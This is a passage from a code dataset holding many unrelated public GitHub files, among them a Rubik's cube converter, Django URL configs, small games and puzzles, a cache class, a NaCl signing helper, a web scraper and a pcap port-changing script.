for i in Corner:\n for orientation in range(3):\n # All corner names begin with either a U or D\n if self.pieces[FaceCube.CORNER_FACELETS[i][orientation]] in [Face.U, Face.D]:\n break\n\n color_1 = self.pieces[FaceCube.CORNER_FACELETS[i][(orientation + 1) % 3]]\n color_2 = self.pieces[FaceCube.CORNER_FACELETS[i][(orientation + 2) % 3]]\n\n for j in Corner:\n if color_1 == FaceCube.CORNER_COLORS[j][1] and \\\n color_2 == FaceCube.CORNER_COLORS[j][2]:\n 
cubie_cube.corner_permutations[i] = j\n                    cubie_cube.corner_orientations[i] = orientation\n                    break\n\n        for i in Edge:\n            for j in Edge:\n                if self.pieces[FaceCube.EDGE_FACELETS[i][0]] == FaceCube.EDGE_COLORS[j][0] and \\\n                        self.pieces[FaceCube.EDGE_FACELETS[i][1]] == FaceCube.EDGE_COLORS[j][1]:\n                    cubie_cube.edge_permutations[i] = j\n                    cubie_cube.edge_orientations[i] = 0\n                    break\n                if self.pieces[FaceCube.EDGE_FACELETS[i][0]] == FaceCube.EDGE_COLORS[j][1] and \\\n                        self.pieces[FaceCube.EDGE_FACELETS[i][1]] == FaceCube.EDGE_COLORS[j][0]:\n                    cubie_cube.edge_permutations[i] = j\n                    cubie_cube.edge_orientations[i] = 1\n                    break\n\n        return cubie_cube\n","repo_name":"Arvonit/rubik","sub_path":"backend/rubik/facecube.py","file_name":"facecube.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19480314197","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('turn', views.turn, name='turn'),\n    path('swap', views.swap, name='swap'),\n    path('algorithm', views.algorithm, name='algorithm'),\n]\n","repo_name":"mweltin/sticks","sub_path":"website/game/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23111921757","text":"\"\"\"\r\nNumber Guessing Game\r\n\"\"\"\r\nimport random\r\n\r\nattempts_list = []\r\ndef score():\r\n    if len(attempts_list) <= 0:\r\n        print(\"There's no high score yet, it's yours for the taking\")\r\n    else:\r\n        print(f\"The current high score is {min(attempts_list)} attempts\")\r\n\r\ndef start_game():\r\n    wanna_play = input(\"do you wanna play (enter yes or no): \")\r\n    while wanna_play.lower() != \"yes\" and wanna_play.lower() != \"no\":\r\n        print(\"invalid answer, enter yes or no\")\r\n        wanna_play = input(\"do you wanna play (enter yes or no): \")\r\n    if wanna_play.lower() == \"no\":\r\n        print(\"Adios Amigo\")\r\n        return\r\n    number = random.randint(1, 10)\r\n    score()\r\n    attempts = 0\r\n    while True:\r\n        try:\r\n            guess = int(input(\"guess a number from one to ten: \"))\r\n            if guess <= 0 or guess > 10:\r\n                raise ValueError(\"only numbers from one to ten are valid\")\r\n            if guess == number:\r\n                print(\"correct, you are a champion\")\r\n                attempts += 1\r\n                attempts_list.append(attempts)\r\n                print(f\"you got it after {attempts} attempts\")\r\n                play_more = input(\"do you want to play again, (enter yes or no): \")\r\n                while play_more.lower() != \"yes\" and play_more.lower() != \"no\":\r\n                    print(\"what do you mean, give a clear answer\")\r\n                    play_more = input(\"do you want to play again, (enter yes or no): \")\r\n                if play_more.lower() == \"no\":\r\n                    print(\"Alright, Adios\")\r\n                    break\r\n                attempts = 0\r\n                score()\r\n                number = random.randint(1, 10)\r\n            elif guess < number:\r\n                attempts += 1\r\n                print(\"try again, it's higher\")\r\n            elif guess > number:\r\n                attempts += 1\r\n                print(\"try again, it's lower\")\r\n        except ValueError as e:\r\n            print(f\"invalid input, {e}\")\r\nstart_game()\r\n\r\n\r\n    \r\n\r\n    ","repo_name":"SanusiWasiu/Python-Projects","sub_path":"Number_guessing.py","file_name":"Number_guessing.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33919047869","text":"\"\"\"skills_ URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n    1. 
Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom books.views import (\n RetrieveBooks, \n RetrieveAuthors,\n CreateAuthor,\n CreateBook,\n RetrieveAuthorAPIView,\n RetrieveBookAPIView)\n#from books.views.modelview import AuthorViewSet\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path('books/', RetrieveBooks.as_view()),\n path('books/create/', CreateBook.as_view()),\n path('books//',RetrieveBookAPIView.as_view()),\n\n path('authors/', RetrieveAuthors.as_view()),\n path('authors/create/', CreateAuthor.as_view()),\n path('authors//',RetrieveAuthorAPIView.as_view()),\n]\n\n #path('viewset/authors/', AuthorViewSet.as_view({'get':'list'})),\n #path('viewset/authors/create/', AuthorViewSet.as_view({'post':'create'})),\n #path('viewset/authors//',AuthorViewSet.as_view(\n # {\n # 'get':'retrieve', \n # 'put':'partial_update', \n # 'delete': 'destroy'\n # }\n # )), \n","repo_name":"betancourtg/Books","sub_path":"skills_/skills_/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74594430567","text":"import numpy as np\n\n# A persistent class that compensates for backlash based on current and past steering angles\n# Created by brendon-ai, January 2018\n\n\n# The factor by which to multiply the delta before adding it to the steering angle\nDELTA_MULTIPLIER = 1.5\n\n# The minimum absolute value of a delta that is large enough to be considered a change in direction\nNOISE_THRESHOLD = 0.001\n\n\n# Main class with a persistent state that is used to calculate future steering angles\nclass BacklashCompensator:\n\n # Initialize global variables\n def __init__(self):\n # Storage for the previous input steering angle\n self.previous_input_steering_angle = 0\n # The delta from the previous input steering angle calculated during the previous steering angle calculation\n self.previous_delta = 0\n\n # Process a steering angle to compensate for backlash, returning a modified steering angle\n def process(self, steering_angle):\n # Calculate the delta from the previous input steering angle\n delta = steering_angle - self.previous_input_steering_angle\n # If the sign of the current delta is different from the previous delta, that is the current steering angle\n # constitutes a change in movement direction\n # And also if the absolute value of the delta is also above a certain threshold, so that overly small deltas,\n # which can probably be considered noise, are not considered a change in direction\n if np.sign(delta) != np.sign(self.previous_delta) and abs(delta) >= NOISE_THRESHOLD:\n # Add the delta multiplied by a scaling factor to the steering angle,\n # to accelerate the change in direction and take up more of the dead band\n processed_steering_angle = steering_angle + (delta * DELTA_MULTIPLIER)\n # Otherwise, the steering angle is continuing to move in the same direction\n else:\n # Use the steering angle unmodified\n processed_steering_angle = steering_angle\n # Store the current delta and steering angle for the next time this 
function is called\n self.previous_input_steering_angle = steering_angle\n self.previous_delta = delta\n # Return the processed steering angle\n return processed_steering_angle\n","repo_name":"bfmat/LaneDetection","sub_path":"infer/backlash_compensator.py","file_name":"backlash_compensator.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36725444209","text":"import threading\n\nclass LinkedList:\n def __init__(self):\n self.__init_link()\n def __init_link(self):\n self.prev = self\n self.next = self\n def __remove(self):\n self.prev.next = self.next\n self.next.prev = self.prev\n def remove(self):\n self.__remove()\n self.__init_link()\n def destroy(self):\n self.__remove()\n self.prev = None\n self.next = None\n def insert(self, ele):\n ele.__remove()\n ele.prev = self\n ele.next = self.next\n self.next.prev = ele\n self.next = ele\n def insert_before(self, ele):\n ele.__remove()\n ele.next = self\n ele.prev = self.prev\n self.prev.next = ele\n self.prev = ele\n\nclass _CacheItem(LinkedList):\n def __init__(self, key, data):\n LinkedList.__init__(self)\n self.data = data\n self.key = key\n self.update_count()\n def update_count(self):\n try:\n self.count = max(len(self.data), 1)\n except:\n self.count = 1\n def __str__(self):\n return str(self.data)\n def __repr__(self):\n return repr(self.data)\n\nclass RecordCache(LinkedList):\n def __init__(self, record_num):\n LinkedList.__init__(self)\n self.__record_num = record_num\n self.__lock = threading.Lock()\n self.__cache = {}\n self.__count = 0\n def _record_getter(self, key):\n pass\n def _rec_iter(self):\n rec = self.prev\n while rec is not self:\n yield rec\n rec = rec.prev\n def __repr__(self):\n with self.__lock:\n return repr({rec.key: rec.data for rec in self._rec_iter()})\n __str__ = __repr__\n def get(self, key):\n try:\n with self.__lock:\n rec = self.__cache[key]\n rec.remove()\n self.insert(rec)\n return rec.data\n except:\n pass\n record = self._record_getter(key)\n self._put_cache(key, record)\n return record\n def _put_cache(self, key, records):\n with self.__lock:\n try:\n rec = self.__cache[key]\n rec.data = records\n old_count = rec.count\n rec.update_count()\n new_count = rec.count\n self.__count += new_count - old_count\n rec.remove()\n self.insert(rec)\n return\n except:\n pass\n while self.__count > self.__record_num:\n if self.prev is self:\n self.__count = 0\n break\n self.__count -= self.prev.count\n old_rec = self.prev\n del self.__cache[old_rec.key]\n old_rec.destroy()\n rec = _CacheItem(key, records)\n self.insert(rec)\n self.__count += rec.count\n self.__cache[key] = rec\n","repo_name":"bec5-group/bec5-web","sub_path":"becv_logger/record_cache.py","file_name":"record_cache.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23787023027","text":"from nacl.public import PrivateKey, PublicKey, Box\nfrom nacl.signing import SigningKey\nfrom nacl.encoding import Base64Encoder\n\n\ndef encrypt(\n public_key: PublicKey, private_key: PrivateKey, data: bytes, encoder=Base64Encoder\n) -> bytes:\n \"\"\"\n Encrypt a message using NaCl\n \"\"\"\n box = Box(private_key, public_key)\n return box.encrypt(data, encoder=encoder)\n\n\ndef base64_encrypt_and_sign_str(\n encryption_key_b64: str, recv_pub_key_b64: str, signing_key_b64: str, data: str\n) -> str:\n signing_key = SigningKey(signing_key_b64.encode(\"utf-8\"), 
encoder=Base64Encoder)\n encryption_key = PrivateKey(\n encryption_key_b64.encode(\"utf-8\"), encoder=Base64Encoder\n )\n recv_pub_key = PublicKey(recv_pub_key_b64.encode(\"utf-8\"), encoder=Base64Encoder)\n\n # Sign data first\n signed_data = signing_key.sign(data.encode(\"utf-8\"))\n\n # Encrypt data\n encrypted_data = encrypt(\n recv_pub_key, encryption_key, signed_data, encoder=Base64Encoder\n )\n\n return encrypted_data.decode(\"utf-8\")\n","repo_name":"cbrnrd/maliketh","sub_path":"client/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"39592274012","text":"import time\n\n\ndef parse(filename: str) -> str:\n with open(filename, \"r\") as f:\n line = f.readline().strip()\n return line\n\n\nField = list[int]\nRock = list[int]\nrocks = [\n [0b0011110],\n [0b0001000, 0b0011100, 0b0001000],\n [0b0000100, 0b0000100, 0b0011100],\n [0b0010000, 0b0010000, 0b0010000, 0b0010000],\n [0b0011000, 0b0011000],\n]\n\nstate_print_map = [[\" \", \"\\033[33m@\\033[0m\"],\n [\"\\033[34m#\\033[0m\", \"\\033[31m×\\033[0m\"]]\n\n\ndef left_collision(rock: Rock, top: int, field: Field) -> bool:\n for y in range(len(rock)):\n r_l = rock[y] << 1\n left_mask = 128 + field[top - y]\n if r_l & left_mask > 0:\n return True\n\n\ndef right_collision(rock: Rock, top: int, field: Field) -> bool:\n for y in range(len(rock)):\n r_l = rock[y] >> 1\n if rock[y] & 1 > 0 or r_l & field[top - y] > 0:\n return True\n\n\ndef bottom_collision(rock: Rock, top: int, field: Field) -> bool:\n if top - len(rock) < 0:\n return True\n\n for y in range(len(rock)):\n if field[top - y - 1] & rock[y] > 0:\n return True\n return False\n\n\ndef print_state(field: Field, rock: Rock, top: int, wind: str, commands: str, cmd_idx: int, n_rocks: int):\n n_lines = 40\n print(f\"\\r\\u001b[{n_lines+5}A\")\n l_wind = \"»\" if wind == \">\" else \" \"\n r_wind = \"«\" if wind == \"<\" else \" \"\n highest_rock_index = highest_rock(field)\n c_per_line = max(30, len(commands)//(n_lines-1))\n print(f\"rock: {n_rocks}\")\n for idx, line in enumerate(field[::-1]):\n cmd_str = \"\"\n if idx * c_per_line < len(commands):\n for c in range(idx * c_per_line, min(len(commands), (idx+1) * c_per_line)):\n if c == cmd_idx:\n cmd_str = cmd_str + f\"\\033[46m{commands[c]}\\033[0m\"\n else:\n cmd_str = cmd_str + commands[c]\n\n if idx == n_lines:\n break\n idx = len(field) - 1 - idx\n rock_index = top - idx\n r_str = \"0000000\"\n if rock_index >= 0 and rock_index < len(rock):\n r_str = \"{0:07b}\".format(rock[rock_index])\n s = \"{0:07b}\".format(line)\n l_str = \"\".join([state_print_map[int(a)][int(b)]\n for a, b in zip(s, r_str)])\n i_str = \" \"\n\n l_delim = \"│\"\n r_delim = \"│\"\n if idx % 10 == 0 and idx != highest_rock_index:\n i_str = f\"{idx:5}\"\n l_str = l_str.replace(\" \", \"\\033[36m┄\\033[0m\")\n r_delim = \"\\033[36m┾\\033[0m\"\n l_delim = \"\\033[36m┽\\033[0m\"\n if idx == highest_rock_index:\n i_str = f\"\\033[31m{idx:5}\\033[0m\"\n l_str = l_str.replace(\" \", \"\\033[31m┄\\033[0m\")\n r_delim = \"\\033[31m┾\\033[0m\"\n l_delim = \"\\033[31m┽\\033[0m\"\n\n print(f\"{i_str} {l_wind} {l_delim}{l_str}{r_delim} {r_wind} {cmd_str}\")\n # print(f\"{i_str} {l_wind} |{l_str}| {r_wind}\")\n if n_lines < len(field):\n print(f\"\\033[35m{len(field)-n_lines:5} ┽┄┄┄┄┄┄┄┾\\033[0m\")\n else:\n print(\" 0 └───────┘\")\n\n\ndef spaw_rock(i: int) -> Rock:\n return rocks[i % 5].copy()\n\n\ndef highest_rock(field: Field) -> 
int:\n    for idx, line in enumerate(field):\n        if line == 0:\n            return idx - 1\n    return 0\n\n\ndef required_field_hight(field: Field, rock: Rock) -> int:\n    return highest_rock(field) + len(rock) + 4\n\n\ndef main():\n    commands = parse(\"test.txt\")\n    rock_id = 1\n    rock = spaw_rock(0)\n\n    field = [0] * required_field_hight([0], rock)\n    rt = len(field) - 1\n    t = 0\n\n    r_rocks = 0\n    use_r_rocks = False\n    t_rocks = 2022\n    n_rocks = 0\n    while n_rocks < t_rocks:\n        # push rock\n        if commands[t] == \"<\" and not left_collision(rock, rt, field):\n            for i in range(len(rock)):\n                rock[i] = rock[i] << 1\n        elif commands[t] == \">\" and not right_collision(rock, rt, field):\n            for i in range(len(rock)):\n                rock[i] = rock[i] >> 1\n        print_state(field, rock, rt, commands[t], commands, t, n_rocks)\n\n        if bottom_collision(rock, rt, field):\n            for i in range(len(rock)):\n                field[rt - i] += rock[i]\n\n            n_rocks += 1\n            if n_rocks == r_rocks and use_r_rocks:\n                use_r_rocks = False\n            if n_rocks == t_rocks:\n                break\n            rock = spaw_rock(rock_id)\n\n            required_hight = required_field_hight(field, rock)\n            additional = required_hight - len(field)\n            if additional > 0:\n                field += [0]*additional\n            if additional < 0:\n                field = field[:additional]\n\n            rt = len(field) - 1\n            rock_id += 1\n        else:\n            rt -= 1\n\n        print_state(field, rock, rt, \"\", commands, t, n_rocks)\n        t = (t+1) % len(commands)\n        if not use_r_rocks:\n            in_str = input()\n            if in_str != \"\":\n                use_r_rocks = True\n                r_rocks = int(in_str)\n\n    print_state(field, rock, rt, \"\", commands, t, n_rocks)\n    print(highest_rock(field)+1)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"StephanBischoff-Digle/adventofcode","sub_path":"2022/17/Python/proto1.py","file_name":"proto1.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"39449472715","text":"from typing import List, Dict\n\ndef get_top_track_info(sp, range):\n    tracks = []\n    track_ids = []\n    top_tracks = sp.current_user_top_tracks(time_range=range, limit=50)['items']\n    for track in top_tracks:\n        track_info = {}\n        track_info['image'] = track['album']['images'][-1] if track['album']['images'] else False\n        track_info['name'] = track['name']\n        track_info['date'] = track['album']['release_date']\n        track_info['album_name'] = track['album']['name']\n        track_info['artists'] = \", \".join([artist['name'] for artist in track['artists']])\n        track_info['popularity'] = track['popularity']\n        track_info['link'] = track['external_urls']['spotify']\n        track_info['preview'] = track['preview_url']\n        track_info['id'] = track['id']\n        track_ids.append(track['id'])\n        tracks.append(track_info)\n    return tracks\n\ndef get_top_artist_info(sp, range):\n    artists = []\n    top_artists = sp.current_user_top_artists(time_range=range, limit=50)['items']\n    for artist in top_artists:\n        artist_info = {}\n        artist_info['image'] = artist['images'][-1] if artist['images'] else False\n        artist_info['name'] = artist['name']\n        artist_info['followers'] = artist['followers']['total']\n        artist_info['genres'] = \", \".join(artist['genres']).title()\n        artist_info['id'] = artist['id']\n        artist_info['popularity'] = artist['popularity']\n        artist_info['link'] = artist['external_urls']['spotify']\n        artists.append(artist_info)\n    return 
artists","repo_name":"timkimcool/spotify-playlister","sub_path":"spotify/scripts/user_top.py","file_name":"user_top.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20930996232","text":"def clasificar():\n numP = 0\n numI = 0\n\n while True:\n try:\n num = int(input(\"Ingrese un número: \"))\n if (num != 0):\n if (num % 2 == 0):\n numP += 1\n else:\n numI += 1\n else:\n break\n except ValueError:\n print(\"Debe ingresar solo números\")\n continue\n return numP, numI\n\nnumP, numI = clasificar()\n\nprint(\"Números pares:\", numP, \"\\nNúmeros impares:\", numI)","repo_name":"Cristhian00/taller1-IA","sub_path":"punto2.py","file_name":"punto2.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14338524421","text":"#!/usr/bin/python\n\"\"\"\nTool to analyze some datalogger raw data\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser(description=\"Tool to analyze some datalogger raw data\")\nparser.add_argument(\"-i\", \"--input-file\", help=\"file to read from\", required=True)\noptions = parser.parse_args(\"-i /var/rrd/snmp/raw/ifTable_2017-11-15.csv\".split())\nif not os.path.isfile(options.input_file):\n print(\"file %s does not exist\" % options.input_file)\n sys.exit(1)\ndata = {}\nmeta = {}\nmeta[\"delimiter\"] = \"\\t\"\nmeta[\"index_keynames\"] = (\"hostname\", \"ifDescr\")\nmeta[\"ts_keyname\"] = \"ts\"\nmeta[\"interval\"] = 300\nheaders = None\nwith open(options.input_file, \"rt\") as infile:\n for line in infile.read().split(\"\\n\"):\n if line == \"\" or line == \"\\n\":\n continue\n if headers is None:\n headers = line.split(meta[\"delimiter\"])\n meta[\"headers\"] = headers\n data[\"length\"] = len(headers)\n for header in headers:\n data[header] = {\n \"isnumeric\" : True,\n \"interval\" : 0\n }\n assert meta[\"ts_keyname\"] in headers\n assert all((index_key in headers for index_key in meta[\"index_keynames\"]))\n else:\n columns = line.split(meta[\"delimiter\"])\n assert len(columns) == data[\"length\"]\n for index, column in enumerate(columns):\n data[headers[index]][\"isnumeric\"] = all((data[headers[index]][\"isnumeric\"], column.isnumeric()))\n print(line)\nmeta[\"value_keynames\"] = dict([(header, \"asis\") for header in headers if data[header][\"isnumeric\"] == True])\nmeta[\"blacklist\"] = [header for header in headers if (data[header][\"isnumeric\"] == False) and (header not in meta[\"index_keynames\"]) and (header != meta[\"ts_keyname\"])]\nprint(json.dumps(meta, indent=4, sort_keys=True))\n","repo_name":"gunny26/datalogger","sub_path":"development/analyze_table.py","file_name":"analyze_table.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6151934485","text":"\"\"\"\nPreprocess the data derived from Antigoni Maria Founta et al.\n\nThis script is ran only once and binarizes the dataset\n\"\"\"\n\nimport pandas as pd\nimport sys\n\ndata_file = sys.argv[1]\noutput_file = sys.argv[2]\n\ncolumns = [\"Tweet\", \"Orig_Label\", \"Vote\"]\ndata = pd.read_csv(data_file, sep=None, names=columns, engine='python')\ndata[\"label\"] = data[\"Orig_Label\"] == \"hateful\"\ndata.to_csv(output_file, header=True, 
index=False)\n","repo_name":"SamSoup/DkNN","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"2095293393","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\nfrom itertools import zip_longest\n\n#/home/rasmesxiii/Documents/forproject.csv\n\njob_name = []\njob_skills = []\n\n# use requests to fetch URL\nweb = requests.get(\"https://wuzzuf.net/search/jobs/?q=django+developer&a=navbg\")\n\n# save page content\nsource = web.content\n\nsoup = BeautifulSoup(source, 'lxml') # requires 2 parameters (page source, parser); search for lxml to learn what it does\n\n\njob_name_tags = soup.find_all(\"a\", {\"class\":\"css-o171kl\"})\njob_skills_tags = soup.find_all('a',{'class':'css-o171kl'})\ncompany = soup.find_all()\nlocation = soup.find_all()\n# print(job_name_tags)\n\nfor i in range(len(job_name_tags)) :\n    job_name.append(job_name_tags[i].text)\n    job_skills.append(job_skills_tags[i].text)\n\n    print(job_name)\n\n    # print(f'{job_name} required skills : \\n {job_skills}')\n\n# for job in job_skills :\n\n#     print(f'{job} ')\n","repo_name":"osamoxdev/My-old-projects","sub_path":"Python_projects/web_scrapping.py","file_name":"web_scrapping.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7531587125","text":"def main():\n    time = str(input(\"What time is it? \")).lower().replace(\" \", \":\")\n    if \"p.m.\" in time:\n        time = format12pm(time)\n    elif \"a.m.\" in time:\n        time = format12am(time)\n    else:\n        time = format24(time)\n\ndef eatingTime(x):\n    if 7 <= x <= 8:\n        print(\"breakfast time\")\n    elif 12 <= x <= 13:\n        print(\"lunch time\")\n    elif 18 <= x <= 19:\n        print(\"dinner time\")\n    return(x)\n\n\ndef format24(x):\n    x = x.split(\":\")\n    h = float(x[0])\n    m = float(x[1])\n    x = round((h + (m / 60)), 2)\n    eatingTime(x)\n\ndef format12pm(x):\n    x = x.split(\":\")\n    h = float(x[0])\n    m = float(x[1])\n    if h == 12:\n        h = 0\n    x = round(((h + 12) + (m / 60)), 2)\n    eatingTime(x)\n\ndef format12am(x):\n    x = x.split(\":\")\n    h = float(x[0])\n    m = float(x[1])\n    if h == 12:\n        h = 0\n    x = round((h + (m / 60)), 2)\n    eatingTime(x)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"xpall/edx-cs50p-psets-clone","sub_path":"PSetScratch/meal2.py","file_name":"meal2.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"25312963194","text":"#!/bin/python3\nimport sys\n\"\"\"\n# Description\n# \n# Given an array of strings, return another array containing all of its longest\n# strings.\n#\n# Example:\n# \n# For inputArray = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"], the output should be\n# allLongestStrings(inputArray) = [\"aba\", \"vcd\", \"aba\"].\n#\n# Input Format\n#\n# array.string inputArray, A non-empty array.\n# 1 ≤ inputArray.length ≤ 10,\n# 1 ≤ inputArray[i].length ≤ 10.\n#\n# Output Format \n#\n# Array of the longest strings, stored in the same order as in the inputArray.\n#\n# Solution:\n\"\"\"\n##############\n# SOLUTION 1 #\n##############\ndef allLongestStrings(inputArray):\n    L = []\n    maxLen = 0\n    for i in range(len(inputArray)):\n        if len(inputArray[i]) == maxLen:\n            L.append(inputArray[i])\n        elif len(inputArray[i]) > maxLen:\n            maxLen = len(inputArray[i])\n            del L[:]\n            L.append(inputArray[i])\n    return L\n\nA = [\"aba\", \"aa\", \"ad\", \"vcd\", 
\"aba\"]\nprint(allLongestStrings(A))","repo_name":"henrypj/codefights","sub_path":"Intro/03-SmoothSailing/allLongestStrings.py","file_name":"allLongestStrings.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15869107515","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom firstuseauthenticator import FirstUseAuthenticator\n\ndef pytest_addoption(parser):\n group = parser.getgroup('jup_hub')\n group.addoption(\n '--foo',\n action='store',\n dest='dest_foo',\n default='2022',\n help='Set the value for the fixture \"bar\".'\n )\n\n parser.addini('HELLO', 'Dummy pytest.ini setting')\n\n\n@pytest.fixture\ndef bar(request):\n return request.config.option.dest_foo\n\n\n@pytest.fixture\ndef firstuseauthenticator_configured():\n \"\"\"firstuseauthenticator object with min_password_length set to 10\"\"\"\n auth = FirstUseAuthenticator()\n auth.min_password_length = 10\n return auth","repo_name":"Sheila-nk/pytest-jup_hub","sub_path":"pytest_jup_hub.py","file_name":"pytest_jup_hub.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991927508","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Change the port in a pcap file\"\"\"\n\nimport argparse\n\nfrom scapy.all import UDP, rdpcap, wrpcap\n\n\ndef change_port(packets, port, output_file):\n for packet in packets:\n if packet.haslayer(UDP):\n packet[UDP].dport = port\n wrpcap(output_file, packet, append=True)\n\n\ndef main():\n argparser = argparse.ArgumentParser(description=\"pcap Port Change\")\n argparser.add_argument(\n \"input\", type=argparse.FileType(\"r\"), help=\"Input pcap trace file\"\n )\n argparser.add_argument(\n \"--port\",\n \"-p\",\n type=int,\n default=36001,\n help=\"Port to use. Default: 36001\",\n )\n argparser.add_argument(\n \"--output\",\n \"-o\",\n type=argparse.FileType(\"w\"),\n help=\"Output pcap file name. 
Default: new_port.pcap\",\n default=\"new_port.pcap\",\n )\n args = argparser.parse_args()\n change_port(rdpcap(args.input.name), args.port, args.output.name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-telescope/ska-low-cbf-cnic-sw","sub_path":"src/ska_low_cbf_sw_cnic/change_port.py","file_name":"change_port.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38272745665","text":"'''\nDefine parameters for different subjects\n'''\n### globals()[pardict['subject']] = pardict.copy()\n\n\ntest000 = {'targetDuration':0.2, 'targetIntensityMode':'fixed',\n 'targetMaxIntensity':80,\n 'highFreq':2100, 'midFreq':1400,'lowFreq':1000, 'trialsPerBlock':3,\n 'punishSoundAmplitude':0.1} #, 'outcomeMode':'simulated'\n\nfrequencySet5to24 = {'lowFreq':5000,'midFreq':11000,'highFreq':24000}\nfrequencySet6to19 = {'lowFreq':6200,'midFreq':11000,'highFreq':19200}\nfrequencySet3to16 = {'lowFreq':3000,'midFreq':7000,'highFreq':16000}\nfrequencySet4to13 = {'lowFreq':3800,'midFreq':7000,'highFreq':12600}\n\n# ======== Adaptive categorization task ========\nsidesDirectMode = {'outcomeMode':'sides_direct', 'delayToTargetMean':0, 'delayToTargetHalfRange':0,\n 'currentBlock':'mid_boundary'}\ndirectMode = {'outcomeMode':'direct', 'delayToTargetMean':0, 'delayToTargetHalfRange':0,\n 'currentBlock':'mid_boundary'}\nincreaseDelayMode = {'outcomeMode':'on_next_correct', 'delayToTargetMean':0, 'delayToTargetHalfRange':0,\n 'currentBlock':'mid_boundary', 'automationMode':'increase_delay', 'targetDuration':0.05,\n 'antibiasMode':'repeat_mistake'}\n\nbasicDiscriminationMode = {'delayToTargetMean':0.2,'currentBlock':'mid_boundary'}\n\n#onNextCorrectMode = {'outcomeMode':'on_next_correct', 'delayToTargetMean':0.2, 'delayToTargetHalfRange':0.05,\n# 'currentBlock':'mid_boundary', 'targetDuration':0.1,'targetMaxIntensity':80,'lowFreq':4000,'highFreq':13000}\n\npsyCurveMidBound = {'trialsPerBlock':2000,'punishTimeError':4,'delayToTargetMean':0.2,\n 'currentBlock':'mid_boundary','psycurveMode':'uniform','psycurveNfreq':6}\n\nswitchDailyMode = {'trialsPerBlock':2000,'punishTimeError':4,'delayToTargetMean':0.2}\n\nswitchBlocksMode = {'punishTimeError':4, 'delayToTargetMean':0.2,'trialsPerBlock':200,}\n\nstayBlockMode = {'punishTimeError':4, 'delayToTargetMean':0.2,'trialsPerBlock':2000,}\n\n#pardict.update({'antibiasMode':'repeat_mistake'})\n#pardict.update(basicDiscriminationMode)\n\n\n\n##############################################################################################################\n\ntest086frequency = {'lowFreq':7200,'midFreq':11000,'highFreq':15000}\ntest053frequency = {'lowFreq':6000,'midFreq':14000,'highFreq':19200}\nfixIntensity = {'targetIntensityMode':'fixed','targetMaxIntensity':50}\n\npardict = {'subject':'test086','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(test086frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\ntest086 = pardict.copy()\n\npardict = {'subject':'test053','experimenter':'santiago'}\npardict.update(stayBlockMode)\npardict.update({'currentBlock':'low_boundary'})\npardict.update(test053frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\ntest053 = pardict.copy()\n\npardict = 
